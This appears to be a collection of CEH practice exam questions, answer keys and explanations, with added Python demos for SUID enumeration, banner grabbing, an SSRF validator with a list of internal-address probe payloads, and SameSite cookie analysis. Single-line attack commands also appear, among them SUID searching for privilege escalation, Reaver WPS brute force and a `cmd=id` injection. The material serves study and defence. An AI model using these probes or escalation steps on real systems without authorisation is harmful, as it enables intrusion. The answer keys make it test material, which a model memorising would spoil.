B.Active reconnaissance involves direct interaction with the target, whereas passive reconnaissance does not
C.Passive reconnaissance uses tools like Nmap, while active reconnaissance uses Google dorks
D.Passive reconnaissance is used only during the exploitation phase
AnswerB
This is the core difference between the two approaches.
Why this answer
Active reconnaissance involves direct interaction with the target system, such as sending packets, probes, or connection requests (e.g., using Nmap scans, ping sweeps, or banner grabbing) that can be logged or detected by the target. Passive reconnaissance, in contrast, gathers information without engaging the target directly, relying on publicly available sources (e.g., WHOIS lookups, DNS records, social media, or search engines) and does not generate traffic that reaches the target's network. This distinction is fundamental in the CEH methodology because active techniques carry a higher risk of alerting the target, while passive techniques are stealthier and often used first to avoid detection.
Exam trap
EC-Council often tests the misconception that passive reconnaissance is 'safer' or 'always legal,' but the trap here is confusing the method of interaction (direct vs. indirect) with legality or tool assignment, leading candidates to pick Option A or C instead of the correct definition based on target interaction.
How to eliminate wrong answers
Option A is wrong because legality is not the defining difference; both active and passive reconnaissance can be legal or illegal depending on authorization and jurisdiction—active reconnaissance is not inherently legal, and passive reconnaissance is not inherently illegal. Option C is wrong because it reverses the typical tool usage: Nmap is a primary tool for active reconnaissance (sending packets to discover hosts and services), while Google dorks are a form of passive reconnaissance (searching publicly indexed data without direct interaction). Option D is wrong because passive reconnaissance is primarily used during the footprinting and reconnaissance phase, not the exploitation phase; exploitation occurs after reconnaissance and scanning are complete.
Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?
A.Nmap
B.Wireshark
C.Metasploit
D.Ettercap
AnswerD
Ettercap supports ARP poisoning, DNS spoofing, and other MITM techniques.
Why this answer
Ettercap is a comprehensive suite for man-in-the-middle attacks on LAN, featuring ARP poisoning capabilities. Wireshark is a packet analyzer, Nmap is a network scanner, and Metasploit is an exploitation framework.
A penetration tester is scanning a target and receives the output: 'PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https'. Which Nmap flag was MOST likely used to obtain this output?
A.-sS
B.-O
C.-A
D.-sV
AnswerA
-sS performs a SYN scan and displays open ports with service names.
Why this answer
The output shows open ports with their service names (ssh, http, https) but no version information. The -sS flag performs a SYN (half-open) scan, which by default probes the 1,000 most common TCP ports and labels each open port with the name listed for that port number in Nmap's own nmap-services table, without talking to the service itself. This matches the output format exactly: -sS performs neither version detection nor OS fingerprinting. Note that -sS is also Nmap's default scan type when it runs with raw-socket privileges, so a bare `nmap <target>` as root produces the same output.
Exam trap
The trap here is that candidates often confuse the service name mapping (from -sS or default scan) with version detection (-sV), assuming that seeing 'ssh' or 'http' implies version probing occurred, when in fact Nmap simply maps the port number to a common service name from its database.
How to eliminate wrong answers
Option B is wrong because -O is used for OS detection, which would add OS fingerprinting details (e.g., 'OS: Linux 2.6.32') to the output, not just port states and service names. Option C is wrong because -A enables aggressive scanning (OS detection, version detection, script scanning, traceroute), which would produce far more verbose output including version strings and script results. Option D is wrong because -sV enables version detection, which would append version information (e.g., 'Apache httpd 2.4.41') to each service line, not just the service name from the port mapping.
Which of the following Burp Suite tools is used to automatically fuzz web application inputs and identify common vulnerabilities like SQL injection and XSS?
A.Proxy
B.Repeater
C.Intruder
D.Scanner
AnswerC
Intruder allows automated fuzzing with payloads.
Why this answer
Burp Intruder is a tool for automating customized attacks against web applications, including fuzzing for vulnerabilities.
After gaining initial access to a Linux server, an attacker runs `find / -perm -4000 -o -perm -2000 2>/dev/null`. What is the primary objective of this command?
A.Locate world-writable files for data exfiltration
B.List all files owned by the root user
C.Find configuration files containing passwords
D.Identify files with SUID or SGID bits set for privilege escalation
AnswerD
SUID/SGID binaries run with the privileges of their owner or group rather than those of the user who launches them.
Why this answer
The `-perm -4000` test matches files with the set-user-ID (SUID) bit and `-perm -2000` matches files with the set-group-ID (SGID) bit; `2>/dev/null` discards the permission-denied errors that a full-filesystem walk produces for an unprivileged user. A set-uid root binary that can spawn a shell or read arbitrary files is a standard local privilege-escalation path, which is why this is one of the first commands run after initial access.
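The same test written as a script, as an added example that is not part of the original question set or of any tool named on this page. It reproduces the `find / -perm -4000 -o -perm -2000` logic with the stat bit masks, runs it against a throwaway directory tree built with those bits set (so it works offline without walking the real filesystem), and triages the hits against a short, illustrative list of binaries that are known to be abusable when set-uid root. Both the sample tree and KNOWN_ABUSABLE are constructed for the example.

```python
"""Enumerate SUID/SGID files and triage the ones worth a closer look.

Added example (not from the original question set). It reproduces the
`find / -perm -4000 -o -perm -2000` test in Python and runs it against a
throwaway directory tree built with those bits set, so it works offline
without scanning the real filesystem. KNOWN_ABUSABLE is an illustrative
subset, not an authoritative list.
"""
import os
import shutil
import stat
import tempfile

# Assumption for this example: a short list of binaries that, when set-uid
# root, can spawn a shell or read arbitrary files (compare GTFOBins).
KNOWN_ABUSABLE = {"find", "vim", "nmap", "bash", "python3", "cp", "less"}


def find_setid_files(root):
    """Return sorted (path, kind) tuples for regular files with SUID/SGID set.

    `-perm -4000` requires the set-user-ID bit and `-perm -2000` the
    set-group-ID bit, whatever the other permission bits are; the same
    masks (stat.S_ISUID / stat.S_ISGID) are tested here.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries: the noise 2>/dev/null hides
            if not stat.S_ISREG(st.st_mode):
                continue
            kind = []
            if st.st_mode & stat.S_ISUID:
                kind.append("suid")
            if st.st_mode & stat.S_ISGID:
                kind.append("sgid")
            if kind:
                hits.append((path, "+".join(kind)))
    return sorted(hits)


def triage(hits):
    """Split hits into names on the abusable list and everything else."""
    interesting = [h for h in hits if os.path.basename(h[0]) in KNOWN_ABUSABLE]
    other = [h for h in hits if os.path.basename(h[0]) not in KNOWN_ABUSABLE]
    return interesting, other


def build_demo_tree():
    """Constructed sample tree standing in for a target's filesystem."""
    root = tempfile.mkdtemp(prefix="setid-demo-")
    layout = {
        "usr/bin/find": 0o4755,    # set-uid root find: classic escalation path
        "usr/bin/passwd": 0o4755,  # set-uid by design, expected
        "usr/bin/wall": 0o2755,    # set-gid, expected
        "opt/app/backup": 0o4755,  # custom set-uid script: inspect it
        "usr/bin/ls": 0o755,       # no set-id bits: must not be reported
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)  # chmod after writing; writes can clear the bits
    return root


def demo():
    """Scan the constructed tree; returns paths relative to its root."""
    root = build_demo_tree()
    try:
        hits = find_setid_files(root)
        interesting, other = triage(hits)

        def rel(hit):
            return os.path.relpath(hit[0], root), hit[1]

        return {
            "setid": [rel(h) for h in hits],
            "interesting": [rel(h)[0] for h in interesting],
            "other": [rel(h)[0] for h in other],
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

To run it against a live host, call find_setid_files("/") as the low-privileged user; the OSError branch is what keeps permission-denied directories from aborting the walk, exactly as 2>/dev/null hides them for find.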
A penetration tester executes the following command: 'reaver -i wlan0mon -b 00:11:22:33:44:55 -vv'. Which attack is being performed?
A.WEP IV attack
B.Evil twin attack
C.De-authentication attack
D.WPS PIN brute-force attack
AnswerD
Reaver performs brute-force attacks against the WPS PIN to recover the PSK.
Why this answer
Reaver is a tool used for brute-forcing WPS PINs to recover the WPA/WPA2 pre-shared key. The command specifies the interface and BSSID, indicating a WPS attack.
Which TWO of the following are common attack vectors against IoT devices? (Select 2)
Select 2 answers
A.Default credentials
B.Firmware extraction via JTAG
C.Insecure protocols like MQTT without encryption
D.Replay attacks on encrypted sessions
E.SQL injection
AnswersA, C
Many IoT devices ship with default usernames/passwords that remain unchanged.
Why this answer
Default credentials and insecure protocols (e.g., MQTT without TLS) are common IoT attack vectors; firmware extraction is a technique, not a vector; SQL injection is more common in web apps; replay attacks can occur but are not specific to IoT.
During a penetration test, you run the following Nmap command: nmap -sS -sV -O -A -T4 --script=default 10.0.0.1. The scan results show that port 443 is open and the service is 'Apache httpd 2.4.29'. However, banner grabbing with Netcat shows 'Apache/2.4.41 (Ubuntu)'. What is the MOST likely explanation for the discrepancy?
A.The server is using a reverse proxy that presents a different version to Nmap
B.Netcat banner grabbing is more reliable because it reads the actual server response
C.The discrepancy is due to Nmap's OS fingerprinting conflicting with version detection
D.Nmap is more accurate because it uses deep packet inspection
AnswerB
Netcat establishes a TCP connection and reads the service banner directly, while Nmap's -sV uses a database of signatures that may be incomplete or outdated.
Why this answer
Option B is correct because Netcat performs a direct TCP connection to the service and reads the raw banner as sent by the application, which is the most immediate and unfiltered version information. Nmap's version detection (-sV) relies on probe-response matching against its signature database, which can be outdated or misinterpret the service if the server uses banner obfuscation or if the Nmap database does not have an exact match for the newer version. In this case, Netcat reveals the actual server version (2.4.41), while Nmap's database may only have a signature for 2.4.29, leading to a false lower version.
Exam trap
The trap here is that candidates assume Nmap is always more accurate because it is a sophisticated scanning tool, but in version detection, a direct banner grab with Netcat is often more reliable when the service banner is not suppressed.
How to eliminate wrong answers
Option A is wrong because a reverse proxy would typically present the same version to both Nmap and Netcat, or could mask the backend version entirely; it would not cause Nmap to report a lower version than the actual banner. Option C is wrong because OS fingerprinting (-O) is a separate function that does not interfere with version detection; the discrepancy is between two version detection methods, not OS fingerprinting. Option D is wrong because Nmap's version detection does not use deep packet inspection; it sends specific probes and matches responses to a signature database, which can be less accurate than a direct banner grab if the database is outdated or the service responds differently to probes.
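What a direct banner grab actually reads, as an added example that is not from the original question. It sends the same minimal request Netcat would over a plain TCP connection, returns the raw response bytes, and parses the Server header out of them; a throwaway HTTP server on the loopback interface, answering with a constructed "Apache/2.4.41 (Ubuntu)" banner, stands in for the target so the demo runs offline. This is the check to run whenever a -sV result looks doubtful.

```python
"""Grab an HTTP Server banner the way `nc host port` does, then parse it.

Added example, not from the original question. The live grab runs against
a throwaway HTTP server on the loopback interface so it works offline; the
Apache version strings are constructed sample data.
"""
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def parse_server_header(raw):
    """Return the Server header value from raw HTTP response bytes, or None."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"server":
            return value.strip().decode("latin-1")
    return None


def grab_banner(host, port, path="/", timeout=5.0):
    """Open a plain TCP connection, send a minimal HEAD, return raw bytes.

    HTTP/1.0 without keep-alive makes the server close the connection,
    so reading until EOF (or the end of the headers) is enough.
    """
    request = f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
            if b"\r\n\r\n" in b"".join(chunks):
                break
    return b"".join(chunks)


class _FakeApache(BaseHTTPRequestHandler):
    """Constructed stand-in: answers like an Apache 2.4.41 on Ubuntu."""
    server_version = "Apache/2.4.41"  # version_string() = server_version + " " + sys_version
    sys_version = "(Ubuntu)"

    def do_HEAD(self):
        self.send_response(200)  # send_response() also emits Server: and Date:
        self.send_header("Content-Type", "text/html")
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet


def demo():
    """Start the fake server on 127.0.0.1, grab its banner, return the value."""
    httpd = HTTPServer(("127.0.0.1", 0), _FakeApache)
    worker = threading.Thread(target=httpd.serve_forever, daemon=True)
    worker.start()
    try:
        raw = grab_banner("127.0.0.1", httpd.server_address[1])
        return parse_server_header(raw)
    finally:
        httpd.shutdown()
        httpd.server_close()


if __name__ == "__main__":
    print("Server banner:", demo())  # compare against the version nmap -sV reported
```

Against a real target, call grab_banner(host, 80) for plain HTTP; for port 443 the same request must be sent inside a TLS session (for example with ssl.SSLContext().wrap_socket), since the banner sits inside the encrypted stream.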
During the reconnaissance phase, a tester discovers that the target company's email server is configured to automatically respond to delivery status notifications (DSNs). Which type of attack could this information facilitate?
A.DNS cache poisoning
B.Email enumeration
C.Man-in-the-middle attack
D.Phishing attack
AnswerB
DSN responses can confirm valid addresses.
Why this answer
Email servers that return Delivery Status Notifications (DSNs, defined in RFC 3461 and RFC 3464; RFC 3461 obsoletes RFC 1891) can be exploited for email enumeration. By sending a message to a non-existent address and watching for the DSN, the attacker learns that the address is invalid, while a valid address produces no DSN or a different one. This lets an attacker systematically verify which addresses exist on the target domain without any of the probe messages being read by a user.
Exam trap
EC-Council often tests the distinction between reconnaissance and enumeration (like email enumeration via DSN) and active attacks (like MITM or phishing), so candidates mistakenly choose 'Phishing attack' because they associate email servers with phishing, but the question specifically asks what the DSN behavior facilitates during reconnaissance.
How to eliminate wrong answers
Option A is wrong because DNS cache poisoning targets the DNS resolver's cache with forged records, not email server DSN behavior. Option C is wrong because a man-in-the-middle attack requires intercepting and relaying communications between two parties, which is unrelated to DSN responses. Option D is wrong because phishing is a social engineering attack that uses deceptive messages to steal credentials, not a reconnaissance technique to enumerate valid email addresses.
A security analyst runs a vulnerability scan with Nessus and receives a report indicating that multiple hosts have the 'MS17-010' vulnerability. What is the MOST likely impact of this vulnerability if exploited?
A.Remote code execution on Windows systems
B.SQL injection
C.Cross-site scripting
D.DNS cache poisoning
AnswerA
MS17-010 allows RCE via SMB, famously used by WannaCry.
Why this answer
MS17-010 is a critical remote code execution vulnerability in Microsoft's SMBv1 implementation. Exploitation allows an unauthenticated attacker to send specially crafted packets to an SMB server (TCP 445) and execute arbitrary code as SYSTEM. This is the vulnerability leveraged by the EternalBlue exploit used in the WannaCry ransomware outbreak.
Exam trap
The trap here is that candidates may confuse MS17-010 with a general network vulnerability, but the CEH exam specifically tests that it is a remote code execution flaw in Windows SMB, not a web or DNS attack.
How to eliminate wrong answers
Option B is wrong because SQL injection targets database query layers (e.g., SQL statements) and is unrelated to SMB protocol vulnerabilities. Option C is wrong because cross-site scripting (XSS) exploits web application input validation to inject client-side scripts, not SMB remote code execution. Option D is wrong because DNS cache poisoning manipulates DNS resolver caches via forged responses, which is a network-layer attack distinct from the SMB-based MS17-010 flaw.
During a penetration test, a security analyst discovers that an organization's web application uses HTTP for login forms, potentially exposing credentials to interception. Which of the following is the BEST cryptographic control to implement to protect credentials in transit?
A.Implement password hashing with bcrypt on the server side.
B.Use digital signatures to sign the login request.
C.Enforce HTTPS using TLS 1.2 or higher.
D.Encrypt the password field using AES-256 before sending via HTTP.
AnswerC
TLS encrypts the entire communication channel, protecting credentials from interception.
Why this answer
HTTPS with TLS 1.2 or higher encrypts the entire HTTP session, including login credentials, preventing interception and man-in-the-middle attacks. This is the standard control for protecting data in transit: RFC 2818 defines HTTP over TLS, and PCI DSS requires strong cryptography for transmission of cardholder data over open networks. With TLS 1.2, cipher suites such as ECDHE-RSA-AES256-GCM-SHA384 provide forward secrecy (from the ephemeral ECDHE key exchange) together with authenticated encryption (AES-GCM); TLS 1.3 provides forward secrecy with every suite.
Exam trap
The trap here is that candidates confuse encryption at rest (hashing) or partial encryption (AES on password field) with full-session encryption (TLS), or they think digital signatures provide confidentiality, when in fact they only ensure authenticity and integrity.
How to eliminate wrong answers
Option A is wrong because password hashing with bcrypt protects credentials at rest on the server, not during transit over the network. Option B is wrong because digital signatures provide integrity and non-repudiation but do not encrypt the login request, leaving the credentials visible to an interceptor. Option D is wrong because encrypting only the password field with AES-256 before sending over HTTP still leaves the rest of the request (e.g., session tokens, form data) in plaintext, and the encryption key must be shared insecurely, defeating the purpose.
Which TWO of the following are passive reconnaissance techniques? (Select 2)
Select 2 answers
A.Performing a WHOIS lookup
B.Running an Nmap version scan
C.Performing a ping sweep
D.Using Shodan to find exposed devices
E.Banner grabbing with Netcat
AnswersA, D
WHOIS queries public registration databases without contacting the target's servers.
Why this answer
A WHOIS lookup queries public registration databases (domain WHOIS served by registries and registrars, and the RIR databases such as ARIN and RIPE for IP address allocations) to retrieve details such as registrar, creation date, contacts, and name servers. This is passive because it relies on information that is already published, without sending any packets to the target network or interacting with its live systems. Shodan is passive for the same reason: it returns results from Shodan's own pre-collected scan index, so the tester never probes the exposed devices directly.
Exam trap
EC-Council often tests the distinction between passive and active reconnaissance by making candidates confuse techniques that use public databases (passive) with those that send packets to the target (active); the trap here is that banner grabbing with Netcat feels passive because it only reads a response, but it still requires initiating a TCP connection to the target.
Which TWO of the following are techniques used to escalate privileges on a Linux system?
Select 2 answers
A.SMB relay attack
B.Pass-the-hash attack
C.Token impersonation
D.Exploiting a SUID binary
E.Kernel exploit
AnswersD, E
SUID binaries run with the owner's privileges, allowing escalation.
Why this answer
Option D is correct because SUID (Set User ID) binaries execute with the file owner's privileges, typically root. If a misconfigured SUID binary (e.g., one that allows command injection or arbitrary file reads) is exploited, an attacker can escalate from a low-privileged user to root. Common examples include exploiting SUID on binaries like `find`, `nmap`, or custom scripts with weak permissions.
Exam trap
The trap here is that candidates confuse Windows-specific privilege escalation techniques (SMB relay, pass-the-hash, token impersonation) with Linux-specific methods, assuming they are cross-platform.
Based on the exhibit, which service should be targeted first to gain initial access with the highest chance of success?
A.HTTP (80) - exploit Apache vulnerability
B.SSH (22) - brute force user credentials
C.Proxy (8080) - exploit Squid vulnerability
D.MySQL (3306) - exploit CVE-2016-6662
AnswerD
This critical vulnerability leads to code execution as root on the database host, making it the best initial vector among those listed.
Why this answer
MySQL (3306) is the correct target because CVE-2016-6662 is a critical code execution and privilege escalation vulnerability in MySQL (and, at the time, MariaDB and Percona builds). An attacker who can write to a MySQL configuration file, through a database account holding the FILE privilege or through an SQL injection, injects a `malloc_lib` directive into `my.cnf`; the `mysqld_safe` wrapper, which runs as root, then loads the attacker's shared library on the next restart and the code runs as root. Among the listed services it is the only one paired with a specific, publicly documented and exploitable CVE, so it offers the highest chance of success without brute-forcing credentials.
Exam trap
EC-Council often tests the misconception that HTTP or SSH are always the easiest initial footholds, but in this scenario the MySQL CVE-2016-6662 exploit is a known, published vector that requires no credential brute-forcing or version guessing, making it the most reliable choice for initial access.
How to eliminate wrong answers
Option A is wrong because exploiting an Apache vulnerability on port 80 typically requires a known, unpatched CVE with a working exploit, and Apache is generally well-hardened; the question does not specify a vulnerable version, so this is a lower-probability guess. Option B is wrong because brute-forcing SSH (22) credentials is noisy, time-consuming, and often blocked by rate-limiting or fail2ban, making it unreliable for initial access unless weak credentials are confirmed. Option C is wrong because exploiting a Squid vulnerability on port 8080 is uncommon; Squid is a caching proxy with a relatively small attack surface, and most Squid exploits target misconfigurations (e.g., open proxy) rather than providing direct shell access.
Which tool is specifically designed to enumerate SMB shares and user accounts on a Windows target by leveraging the SMB protocol?
A.Enum4linux
B.Wireshark
C.Nmap
D.Hydra
AnswerA
Correct tool for SMB enumeration.
Why this answer
enum4linux is a Perl script that wraps Samba tools (smbclient, rpcclient, net, and nmblookup) to enumerate SMB shares, users, groups, password policy, and more from Windows and Samba hosts.
A security analyst observes the following in Apache access logs: 'GET /cgi-bin/test.cgi?cmd=id HTTP/1.1' 200. This is most likely an attempt at which attack?
A.Command injection
B.Local File Inclusion (LFI)
C.SQL injection
D.Directory traversal
AnswerA
The parameter 'cmd' suggests the CGI script passes input to a shell, allowing command injection.
Why this answer
The 'cmd' parameter in a CGI script is a common indicator of command injection, where the attacker tries to execute system commands.
Which TWO of the following Nmap scans are considered 'stealth' scans that do not complete a full TCP three-way handshake?
Select 2 answers
A.FIN scan (-sF)
B.TCP connect scan (-sT)
C.UDP scan (-sU)
D.SYN scan (-sS)
E.ACK scan (-sA)
AnswersA, D
-sF sends FIN packets and does not complete a handshake.
Why this answer
A FIN scan (-sF) sends a TCP packet with only the FIN flag set. According to RFC 793, if the port is closed, the target responds with an RST packet; if open, the packet is ignored. This avoids completing a full TCP three-way handshake, making it a stealth scan.
Exam trap
The trap here is that candidates often confuse 'stealth' with 'invisible' and incorrectly assume that any scan not completing a handshake qualifies, but the CEH defines stealth scans specifically as those that avoid the full three-way handshake (SYN, FIN, Xmas, Null) and are designed to evade detection, not just any non-handshake scan like ACK scan.
A security analyst wants to check if a web application is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions would be most effective?
A.Submit a base64-encoded payload in a cookie
B.Use SQLMap with a time-based payload
C.Modify the Host header to point to localhost
D.Send a request with a URL parameter pointing to an internal IP address
AnswerD
SSRF occurs when the server fetches a URL provided by the attacker; pointing to an internal IP tests for SSRF.
Why this answer
Crafting a request that makes the server fetch an internal IP address (like 127.0.0.1) and observing if the response includes data from that internal resource is a good test for SSRF.
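The probe described above paired with the validation a hardened fetcher should apply, as an added example that is not from the original question. check_url() enforces a scheme allowlist, rejects embedded credentials, resolves the host, and refuses loopback, private, link-local (including the 169.254.169.254 cloud metadata address), IPv4-mapped IPv6 and similar ranges; ssrf_probe_urls() lists the internal-address payloads a tester submits in the URL parameter. The resolver is injectable so the check can be exercised offline against DEMO_DNS, a constructed lookup table with invented hostnames; system_resolve() is what production code would pass.

```python
"""Validate a user-supplied URL before a server-side fetch (SSRF check).

Added example, not from the original question. DEMO_DNS and the hostnames in
it are constructed for offline demonstration; system_resolve() is the real
resolver to use in practice.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS table (hypothetical names, documentation/example addresses).
DEMO_DNS = {
    "intranet.corp": ["10.0.0.5"],
    "www.example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "rebind.attacker.test": ["198.51.100.7", "127.0.0.1"],  # one public, one loopback
}


def demo_resolve(host):
    """Offline resolver over DEMO_DNS; raises ValueError like an NXDOMAIN."""
    try:
        return DEMO_DNS[host]
    except KeyError:
        raise ValueError(f"no record for {host}")


def system_resolve(host):
    """Real resolver: every address the system returns for the name."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def _is_internal(ip):
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_url(url, resolve=system_resolve):
    """Return (allowed, reason). Every address the host resolves to must be external."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]  # literal IP (v4 or v6)
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
        except (socket.gaierror, ValueError, OSError) as exc:
            return False, f"cannot resolve {parts.hostname!r}: {exc}"
    if not addrs:
        return False, "resolver returned no addresses"
    for ip in addrs:
        if _is_internal(ip):
            return False, f"{parts.hostname} maps to disallowed address {ip}"
    return True, "ok"


def ssrf_probe_urls():
    """Payloads a tester submits in the URL parameter to look for SSRF."""
    return [
        "http://127.0.0.1/",
        "http://localhost:8080/admin",
        "http://169.254.169.254/latest/meta-data/",
        "http://[::1]/",
        "http://[::ffff:10.0.0.1]/",
        "http://intranet.corp/",
    ]


if __name__ == "__main__":
    for url in ssrf_probe_urls() + ["https://www.example.com/"]:
        print(url, "->", check_url(url, demo_resolve))
```

Two caveats for the defensive side: resolving the name and then letting an HTTP library resolve it again is a time-of-check/time-of-use gap (DNS rebinding), so connect to the address you validated; and redirects must be re-validated hop by hop or disabled, since a permitted external host can 302 to an internal one.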
A penetration tester runs `snmpwalk -c public -v2c 192.168.1.50 1.3.6.1.2.1.1` and receives a list of system descriptions, uptime, and contact information. Which type of information is the tester primarily gathering?
A.SMB share names and permissions
B.System information and version details
C.Network topology and routing tables
D.Active directory users and groups
AnswerB
The system group OID provides hostname, OS version, uptime, and contact info.
Why this answer
The `snmpwalk` command with the OID `1.3.6.1.2.1.1` (the system group in MIB-II, defined in RFC 1213) queries the SNMP agent for system-level information. The output includes system description, uptime, contact, and version details, which are all part of the system group. This is a classic enumeration technique to gather system information and version details from a target device using SNMP with the default public community string.
Exam trap
The trap here is that candidates often confuse the system group OID (1.3.6.1.2.1.1) with other MIB branches like the interfaces group or IP group, leading them to incorrectly select network topology or routing tables, but the system group specifically returns device identity and version information.
How to eliminate wrong answers
Option A is wrong because SMB share names and permissions are enumerated using tools like `smbclient` or `enum4linux`, not via SNMP OID 1.3.6.1.2.1.1, which is the system group. Option C is wrong because network topology and routing tables are obtained from OIDs under 1.3.6.1.2.1.4 (IP group) and 1.3.6.1.2.1.4.21 (ipRouteTable), not the system group. Option D is wrong because Active Directory users and groups are typically enumerated via LDAP queries or tools like `ldapsearch`, not through SNMP, which does not expose AD object data via the system group OID.
During a penetration test, you successfully gain access to a web server with a low-privileged shell. You want to escalate privileges to root. Which of the following techniques is MOST likely to achieve privilege escalation on a misconfigured Linux system?
A.Use the `netcat` tool to establish a reverse shell back to the attacker
B.Search for and exploit a SUID binary that allows privilege escalation
C.Use a password cracking tool like John the Ripper on the system's shadow file
D.Perform a brute force attack on the root password
AnswerB
SUID binaries execute with the owner's privileges. If a binary like `find` or `vim` has SUID set, it can be exploited to run commands as root.
Why this answer
Option B is correct because SUID (Set User ID) binaries execute with the privileges of the file owner, typically root. On a misconfigured Linux system, a low-privileged user can run a SUID-root binary (e.g., `find`, `vim`, `nmap`) to spawn a shell with root privileges, directly achieving privilege escalation without needing credentials or additional exploits.
Exam trap
The trap here is that candidates confuse establishing a reverse shell (which maintains the current privilege level) with privilege escalation, or they assume password cracking is feasible without first obtaining the hashed password file.
How to eliminate wrong answers
Option A is wrong because `netcat` is a network utility for establishing reverse shells or listening for connections; it does not escalate privileges—it only provides a remote shell at the current privilege level. Option C is wrong because John the Ripper cracking the shadow file requires read access to `/etc/shadow`, which a low-privileged shell typically does not have (shadow file is readable only by root or the shadow group). Option D is wrong because brute-forcing the root password is impractical: it requires network or console access, risks account lockout, and is noisy; moreover, the goal is to exploit a misconfiguration, not guess credentials.
An analyst reviews the following HTTP response: HTTP/1.1 200 OK
Set-Cookie: sessionid=abc123; SameSite=None; Secure
...
<html><body><p>Welcome back!</p></body></html>. What possible vulnerability exists if the application does not use CSRF tokens?
A.Cross-site request forgery (CSRF)
B.Clickjacking
C.Cross-site scripting (XSS)
D.Session fixation
AnswerA
With SameSite=None, cookies are sent on cross-site requests, and without CSRF tokens, the application is vulnerable to CSRF.
Why this answer
SameSite=None allows cross-site requests to include cookies, making CSRF possible if no CSRF tokens are used. SameSite=Lax or Strict would block some CSRF attacks.
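The SameSite rule applied to the response above, as an added example that is not part of the original question. It parses a Set-Cookie header and models when a browser attaches the cookie to a cross-site request: None on any cross-site request (and only accepted together with Secure), Lax only on top-level navigations with safe methods such as GET, Strict never cross-site. A forged cross-site form POST therefore arrives authenticated only under SameSite=None, which is the CSRF condition the question describes. The Chromium default for a missing attribute is assumed to be Lax; pass default_samesite="none" to assess a legacy browser.

```python
"""Decide whether a cross-site request would carry a session cookie.

Added example, not part of the original question. Models the SameSite
attribute semantics; the Lax-by-default assumption follows Chromium.
"""
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}


def parse_set_cookie(header):
    """Return (name, value, attrs); attribute names lower-cased, flags -> True."""
    parts = [p.strip() for p in header.split(";")]
    name, _sep, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return name.strip(), value.strip(), attrs


def sent_cross_site(attrs, method, top_level_navigation, default_samesite="lax"):
    """Would the browser attach this cookie to a cross-site request?

    default_samesite is what the browser assumes when SameSite is absent:
    "lax" models Chromium's default; pass "none" to assess legacy browsers
    that still treat a missing attribute as None (worst case).
    """
    mode = str(attrs.get("samesite", default_samesite)).lower()
    if mode == "none":
        return attrs.get("secure") is True  # None without Secure is rejected outright
    if mode == "strict":
        return False
    # Lax: only top-level navigations (link click, form GET) with a safe method
    return bool(top_level_navigation) and method.upper() in SAFE_METHODS


def csrf_exposed(header, csrf_token_used, default_samesite="lax"):
    """Classic CSRF: a cross-site form POST authenticated by the cookie alone."""
    _name, _value, attrs = parse_set_cookie(header)
    return (sent_cross_site(attrs, "POST", top_level_navigation=True,
                            default_samesite=default_samesite)
            and not csrf_token_used)


if __name__ == "__main__":
    header = "sessionid=abc123; SameSite=None; Secure"  # from the question's response
    print(parse_set_cookie(header))
    print("CSRF exposed without tokens:", csrf_exposed(header, csrf_token_used=False))
    print("CSRF exposed with tokens:", csrf_exposed(header, csrf_token_used=True))
```

One refinement the model leaves out: Chromium's "Lax+POST" behaviour allows top-level POSTs to carry a cookie that lacks SameSite for the first two minutes after it is set, so a freshly issued session cookie without the attribute is briefly exposed even in a Lax-by-default browser.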
Which TWO of the following Nmap flags are used for evasion of IDS/IPS? (Choose two.)
Select 2 answers
A.-sV
B.-O
C.-D
D.-f
E.-sT
AnswersC, D
Decoy scan uses multiple source IPs to confuse IDS.
Why this answer
Option C (-D) is correct because the Nmap decoy scan flag allows you to spoof multiple source IP addresses, making it difficult for IDS/IPS to distinguish the real scanning host from decoys. Option D (-f) is correct because fragmenting packets (e.g., using -f to split TCP headers into 8-byte fragments) evades signature-based detection by bypassing pattern-matching rules that expect complete packet headers.
Exam trap
EC-Council often tests the misconception that -sV or -O are evasion techniques because they are 'stealthy' in some contexts, but the CEH exam specifically requires knowing that decoys (-D) and fragmentation (-f) are the standard Nmap evasion flags.
Which TWO of the following are examples of application-layer DDoS attacks?
Select 2 answers
A.ICMP flood
B.Slowloris
C.SYN flood
D.HTTP flood
E.UDP flood
AnswersB, D
Slowloris keeps many connections open by sending partial HTTP requests.
Why this answer
Slowloris and HTTP flood are application-layer attacks targeting the web server's ability to handle requests. SYN flood and UDP flood are lower-layer attacks (transport and network).
